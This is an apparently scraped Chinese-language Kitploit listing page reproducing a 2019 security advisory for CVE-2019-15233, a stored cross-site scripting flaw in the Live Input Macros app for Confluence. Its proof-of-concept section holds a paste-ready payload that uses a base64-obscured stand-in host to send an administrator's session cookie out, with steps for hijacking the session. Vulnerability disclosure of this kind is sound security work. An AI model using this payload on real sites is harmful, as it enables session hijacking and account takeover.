Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-15233 — 针对CVE-2019-15233的概念验证漏洞利用:Confluence的Live Input Macros中的跨站脚本(XSS)漏洞,通过恶意输入实现会话劫持。 | Kitploit
工具/GitHubGitHub/l0nax/cve-2019-15233
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubl0nax/cve-2019-15233

CVE-2019-15233

针对CVE-2019-15233的概念验证漏洞利用:Confluence的Live Input Macros中的跨站脚本(XSS)漏洞,通过恶意输入实现会话劫持。

查看仓库
116年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-15233

(FAB-2019-00157) 由我发现的安全漏洞 CVE-2019-15233

安全公告: advisory

基本信息

Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH

致谢

此安全漏洞由 Francesco Emanuel Bennici [email protected]
(FABMation GmbH)发现。

描述

Live Input Macros 允许用户将复选框、单选按钮、下拉列表等添加到 Confluence 页面,并在不编辑页面的情况下进行更改。

如果用户添加了恶意代码,攻击者可以在 Confluence 站点上执行 JavaScript 代码。

此漏洞可用于窃取(例如)管理员的会话 Cookie(会话劫持)。

概念验证/利用

复制以下内容:

Hello World this is my Text Box </p> </div>





alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd

然后在 Confluence 页面上创建一个新元素。将这段文本粘贴进去,并与(例如)系统管理员共享该 Confluence 页面。当管理员访问该页面时,你就可以劫持/“复制”他的会话。

下载工具